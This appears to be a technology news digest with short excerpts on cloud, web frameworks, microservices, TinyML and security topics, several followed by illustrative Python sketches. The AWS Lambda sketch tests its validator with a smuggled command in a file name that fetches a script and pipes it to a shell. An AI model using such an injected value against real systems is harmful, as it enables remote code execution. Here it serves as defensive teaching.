The lowdown on industry clouds

If you ask today’s CIOs why some applications won’t move to the cloud, they will

mention issues such as a lack of systems that can deal with compliance, or

vertically oriented applications and data that are too important to entrust to

the cloud. Cloud providers now offer or will soon offer prebuilt,

industry-specific features and services that typically will be better than

anything companies could build and maintain themselves. The coming

industry-specific world of cloud will move the needle enough for many

enterprises to commit their critical data and applications to the cloud. The

cloud providers understand this paradigm, and in many cases, the development and

deployment of industry-specific cloud services may be a loss leader that will

drive more adoption. It’s important that we understand the likely motivations

of the cloud providers before we adopt any cloud services, and I’ve made some

educated assumptions here. There is always risk when you become too tightly

coupled to any cloud service, because each one will go away at some point.

Htmx: HTML Approach to Interactivity in a JavaScript World

Complexity in frontend web development is something that Gross has been

attempting to address for nearly a decade now, having first created the

intercooler.js alternative frontend library back in 2013, which came with the

tagline “AJAX With Attributes: There is no need to be complex”. Recently,

intercooler.js hit version 2.0 and became htmx, which the GitHub description

says “allows you to access AJAX, CSS Transitions, WebSockets and Server Sent

Events directly in HTML, using attributes, so you can build modern user

interfaces with the simplicity and power of hypertext”. ... More simply, Gross

described htmx as attempting “to stay within the original model of the web,

using HTML and Hypermedia concepts, rather than asking developers to write a lot

of JavaScript.” Somewhat amusingly for this discussion, htmx is a JavaScript

library — but in keeping with this simplistic approach, it is dependency-free

and frontend developers using htmx do not need to write JavaScript to achieve

similar functionality.
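
To make the attribute-driven idea concrete, here is a minimal sketch of the server side. It assumes a Python backend, which the excerpt does not mention, and the endpoint `/news`, the element id `news-list`, and both function names are hypothetical. The `hx-get`, `hx-target` and `hx-swap` attributes are htmx's own: the button asks the server for a fragment, and htmx swaps the returned HTML into the target element.

```python
from html import escape


def render_button(endpoint: str, target_id: str) -> str:
    """Return a button that htmx wires up through attributes alone."""
    return (
        f'<button hx-get="{escape(endpoint, quote=True)}" '
        f'hx-target="#{escape(target_id, quote=True)}" '
        f'hx-swap="innerHTML">Load items</button>'
    )


def render_fragment(items: list[str]) -> str:
    """Return the HTML fragment the server would send back for the swap."""
    rows = "".join(f"<li>{escape(item)}</li>" for item in items)
    return f"<ul>{rows}</ul>"


if __name__ == "__main__":
    print(render_button("/news", "news-list"))
    print(render_fragment(["first item", "second item"]))
```

The page author writes no JavaScript here: the behavior lives in the markup, and the server answers with HTML rather than JSON.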

How to Become a Serverless Developer in 2022

When building a solution it is possible to do it all in the AWS Console.

That's how I started my AWS journey. The issue is that it is not controllable,

manageable or scalable. If you want to copy this setup to another account

(separate dev and prod accounts) you have to remember all the steps you've

done. Working with multiple team members can get messy. That is why it's

helpful to use a framework to allow us to write Infrastructure-as-Code (IaC).

This allows us to use Git for version control. This makes working as a team

much easier and enables multi-environment deployments, even continuous

integration and deployment, all of which are required when running

production workloads ... I would recommend starting with a personal project

that you use just for practicing with new services. That way you don't

have to worry about breaking things and you can focus on how the service is

working. You can now start using it in production apps and this is where

you'll learn a lot about the details of a service.
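
As a rough illustration of why Infrastructure-as-Code helps with separate dev and prod accounts, the sketch below generates a CloudFormation-style template from one Python function. The excerpt does not name a framework, so this is an assumption for illustration only: the function name `build_template`, the resource name `HelloFunction`, and the role ARN are all hypothetical.

```python
import json


def build_template(env: str, role_arn: str) -> dict:
    """Build a CloudFormation-style template for one environment (dev, prod, ...)."""
    return {
        "AWSTemplateFormatVersion": "2010-09-09",
        "Description": f"Hello function for the {env} environment",
        "Resources": {
            "HelloFunction": {
                "Type": "AWS::Lambda::Function",
                "Properties": {
                    "FunctionName": f"hello-{env}",
                    "Runtime": "python3.12",
                    "Handler": "index.handler",
                    "Role": role_arn,
                    # Inline source keeps the sketch self-contained.
                    "Code": {
                        "ZipFile": "def handler(event, context):\n    return 'hello'\n"
                    },
                },
            }
        },
    }


if __name__ == "__main__":
    # Hypothetical role ARN; a real deployment would use its own execution role.
    role = "arn:aws:iam::123456789012:role/hello-lambda-role"
    for env in ("dev", "prod"):
        print(json.dumps(build_template(env, role), indent=2))
```

Because the template is plain text produced from code, it can be committed to Git, reviewed by teammates, and deployed identically to each account instead of being re-clicked in the console.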



From monolith to microservices: How applications evolve

A microservices-oriented application (MOA) addresses the shortcomings inherent

in the monolithic application design. As described earlier, monolithic

applications are hard to maintain and upgrade. Due to the tight coupling

that's implicit in a monolithic application's construction, even making a

small change can create unforeseen problems that can cascade throughout the

application stack. On the other hand, MOAs are loosely coupled, some say to an

extreme. According to the five principles described in the previous article of

this series, a microservice is an entirely independent unit of computing. It

has a distinct presence on the network and carries its own data. It's

completely and independently responsible for its own well-being. This means

that as long as changes in its public interface do not affect current

consumers of the service, a microservice can be changed independently of any other

microservice in the MOA. Figure 4 illustrates an MOA that is a transformation

of the monolithic application described previously. Notice that each

microservice has its own IP address and port assignment.
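
The idea that each microservice has its own network address and carries its own data can be sketched with the Python standard library. This is a toy under stated assumptions, not the article's architecture: the service names `orders` and `users`, their data, and the helper names are hypothetical, and both services run on the loopback address with OS-assigned ports.

```python
import http.client
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def make_service(name: str, data: dict) -> HTTPServer:
    """Create a tiny service that owns `data` and exposes it over HTTP."""

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = json.dumps({"service": name, "data": data}).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):
            pass  # keep the demo output quiet

    # Port 0 asks the OS for a free port, so each service gets its own.
    return HTTPServer(("127.0.0.1", 0), Handler)


def call(server: HTTPServer) -> dict:
    """Act as a consumer: reach the service only through its public interface."""
    host, port = server.server_address
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", "/")
        return json.loads(conn.getresponse().read())
    finally:
        conn.close()


def demo() -> list[dict]:
    services = [
        make_service("orders", {"count": 2}),
        make_service("users", {"count": 5}),
    ]
    for service in services:
        threading.Thread(target=service.serve_forever, daemon=True).start()
    try:
        return [call(service) for service in services]
    finally:
        for service in services:
            service.shutdown()
            service.server_close()


if __name__ == "__main__":
    print(demo())
```

Either service could be rewritten internally without touching the other, as long as the JSON it returns keeps the same shape for its consumers.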

TinyML is bringing neural networks to small microcontrollers

There have been multiple efforts to shrink deep neural networks to a size that

fits on small-memory computing devices. However, most of these efforts are

focused on reducing the number of parameters in the deep learning model. For

example, “pruning,” a popular class of optimization algorithms, compresses

neural networks by removing the parameters that are not significant in the

model’s output. The problem with pruning methods is that they don’t address

the memory bottleneck of the neural networks. Standard implementations of deep

learning libraries require an entire network layer and activation maps to be

loaded into memory. Unfortunately, classic optimization methods don’t make any

significant changes to the early layers of the network, especially in

convolutional neural networks. This causes an imbalance in the size of

different layers of the network and results in a “memory-peak” problem: Even

though the network becomes lighter after pruning, the device running it must

have as much memory as the largest layer.
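
The memory-peak argument can be checked with simple arithmetic. The sketch below uses hypothetical layer shapes for a small convolutional network and assumes one byte per activation value; it only counts each layer's output activation map, which is a simplification of what a real runtime holds in memory. Pruning is modeled, again as an assumption, by halving the channels of the later layers while leaving the early layers untouched.

```python
def activation_bytes(height: int, width: int, channels: int, bytes_per_value: int = 1) -> int:
    """Size of one layer's output activation map."""
    return height * width * channels * bytes_per_value


def peak_memory(layers: list[tuple[str, int, int, int]]) -> int:
    """The device needs at least as much memory as the largest layer."""
    return max(activation_bytes(h, w, c) for _, h, w, c in layers)


# Hypothetical (name, height, width, channels) output shapes.
original = [
    ("conv1", 112, 112, 16),
    ("conv2", 56, 56, 32),
    ("conv3", 28, 28, 64),
    ("conv4", 14, 14, 128),
]

# Pruning that only thins the later layers: early layers keep their size.
pruned = [
    ("conv1", 112, 112, 16),
    ("conv2", 56, 56, 32),
    ("conv3", 28, 28, 32),
    ("conv4", 14, 14, 64),
]

if __name__ == "__main__":
    for label, net in (("original", original), ("pruned", pruned)):
        total = sum(activation_bytes(h, w, c) for _, h, w, c in net)
        print(label, "total:", total, "peak:", peak_memory(net))
```

In this toy network the total activation size drops after pruning, but the peak stays at the size of `conv1`, which is the imbalance the excerpt describes.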

The evolution of security analytics

The third generation of security analytics technologies brings us to the

current day, where machine learning, behavioral analysis and customization are

driving innovation. There are now SIEM products that allow organizations to

use their existing data lakes, rather than forcing customers to use

proprietary ones. And some solutions have opened their analytics, enrichment,

and machine learning models so users can better understand them and modify as

needed. Today, powerful algorithms find patterns in data, set baselines and

identify outliers. There’s also a greater focus on identifying anomalous

behavior (a user taking suspicious actions) and on prioritizing and ranking

the risk of alerts based on contextual information like data from SharePoint

or IAM systems. For example, a user accessing source code with legitimate

credentials might be a low-priority alert at best, but that user doing so in

the middle of the night for the first time in weeks from a suspicious location

should trigger a high-priority alert.
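
The source-code example above can be expressed as a small scoring rule. This is a hand-written sketch, not how any particular SIEM product works: the field names, weights and thresholds are all hypothetical, and a real system would learn baselines from data rather than hard-code them.

```python
from dataclasses import dataclass


@dataclass
class AccessEvent:
    user: str
    resource: str
    hour: int  # 0-23, local time of the access
    days_since_last_access: int
    location_trusted: bool


def risk_score(event: AccessEvent) -> int:
    """Add up contextual signals; the weights are illustrative assumptions."""
    score = 1  # baseline: legitimate credentials touching a sensitive resource
    if event.hour < 6 or event.hour >= 22:
        score += 2  # middle of the night
    if event.days_since_last_access >= 14:
        score += 2  # first access in weeks
    if not event.location_trusted:
        score += 3  # suspicious location
    return score


def priority(score: int) -> str:
    if score >= 6:
        return "high"
    if score >= 3:
        return "medium"
    return "low"


if __name__ == "__main__":
    routine = AccessEvent("dana", "source-code", 14, 1, True)
    unusual = AccessEvent("dana", "source-code", 3, 21, False)
    for event in (routine, unusual):
        print(event.hour, priority(risk_score(event)))
```

The same credentials produce a low-priority alert in the routine case and a high-priority alert once the time, recency and location signals stack up.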

Vulnerable AWS Lambda function – Initial access in cloud attacks

From a security perspective, because a Lambda function is managed by the cloud

provider but still configurable by the user, the security concerns and

risks are shared between the two. Since the user doesn’t have control

over the infrastructure behind a specific Lambda function, the security risks

on the infrastructure underneath are managed directly by the cloud

provider. ... In order to successfully mitigate this scenario, we can act

on different levels and different features. In particular, we

could: Disable the public access for the S3 bucket, so that it will be

accessible just from inside and to the users who are authenticated into the

cloud account; Check the code used inside the Lambda function, to be sure

there aren’t any security bugs inside it and all the user inputs are correctly

sanitized following the security guidelines for writing code

securely; Apply the principle of least privilege to all the AWS IAM roles

applied to cloud features to avoid unwanted actions or possible privilege

escalation paths inside the account.
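
Two of the mitigations above, input sanitization and least privilege, can be sketched as follows. The excerpt does not show the vulnerable function, so everything here is an assumption for illustration: the event field `file_name`, the allowlist pattern, and the bucket name `example-upload-bucket` are hypothetical. The handler signature `(event, context)` and the IAM policy document layout follow the standard AWS shapes.

```python
import json
import re

# Allowlist: letters, digits, dot, dash, underscore. No path separators,
# spaces or shell metacharacters can pass.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,128}")


def handler(event, context):
    """Reject any file name that is not on the allowlist before using it."""
    name = event.get("file_name", "")
    if not isinstance(name, str) or not SAFE_NAME.fullmatch(name) or ".." in name:
        return {"statusCode": 400, "body": json.dumps({"error": "invalid file name"})}
    return {"statusCode": 200, "body": json.dumps({"accepted": name})}


# Least privilege: the function's role may only read objects from one bucket.
# The bucket name is hypothetical.
LEAST_PRIVILEGE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject"],
            "Resource": "arn:aws:s3:::example-upload-bucket/*",
        }
    ],
}

if __name__ == "__main__":
    print(handler({"file_name": "report.csv"}, None))
    print(handler({"file_name": "a; curl example.com | sh"}, None))
    print(json.dumps(LEAST_PRIVILEGE_POLICY, indent=2))
```

Validating against an allowlist is generally safer than trying to strip known-bad characters, and a narrowly scoped role limits what an attacker can do even if the function's code is compromised.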

Farming 3.0: How AI, IoT and Mobile Apps Are Driving the AgriTech Revolution

Artificial Intelligence (AI)-led data points will be a crucial deciding factor

for farming in the coming decades. AI-led precision agriculture and farm

management, pest prevention, agricultural robots, automated weeding and crop

quality identification will help improve operational efficiency through

a unified supply chain and make farming smart, predictive and intelligent. AI is

also playing a crucial role in symptom identification in the animal husbandry

space and helps in quicker diagnosis so that livestock isn’t affected on

a large scale and any major outbreaks can be stopped early. To take

full advantage of AI-driven tech, the Indian agricultural sector needs to solve

two problems: have better digital infrastructure in rural areas and have

effective data practices. Smart apps are the next frontier of development in

farming. As the number of agritech start-ups grows, there is a proliferation

of mobile-based smart apps in the whole agricultural ecosystem.

Open source developers, who work for free, are discovering they have power

This system’s inequity is often revealed when there’s a widespread security

breach, such as the Log4Shell vulnerabilities that emerged in the Log4j Java

library in December 2021, triggering a slew of critical security vulnerability

bulletins that affected some of the largest companies in the world. The

developers of the affected library were forced to work around the clock to

mitigate the problems, without compensation or much acknowledgement that their

work had been used for free in the first place. CURL’s developer experienced

similar behavior, with companies depending on his projects demanding he fly

out to help them when they faced trouble with their code, despite not paying

him for his services. As a result, it shouldn’t be a surprise that some open

source developers are beginning to realize they wield outsized power, despite

the lack of compensation they receive for their work, because their projects

are used by some of the largest, most profitable companies in the world.

The Drawbacks of a SOAR

SOARs are great at automatically detecting, assessing, and helping to mitigate

security threats. But threat detection, assessment, and mitigation are only

one element of a broader cybersecurity strategy. Defining a total security

strategy also requires efforts like determining where the greatest

cybersecurity risks to your business lie, optimizing your security posture

(which SOARs don’t really do), and ensuring that security is a priority across

the organization, not just for security engineers. Without these insights, you

don’t know how to prioritize threats, how to assess the impact of breaches,

and so on. Over-reliance on SOARs alone, then, leaves businesses at risk of

focusing too much on the operational components of security (like incident

detection and response) and not enough on the broader strategy that forms the

foundation for effective security operations. ... The fact that SOARs cater

mostly to security experts also means that they do a poor job of enforcing a

security-centric culture across the organization.

Quote for the day:

"Every great leader has incredible odds to overcome." -- Wayde Goodall
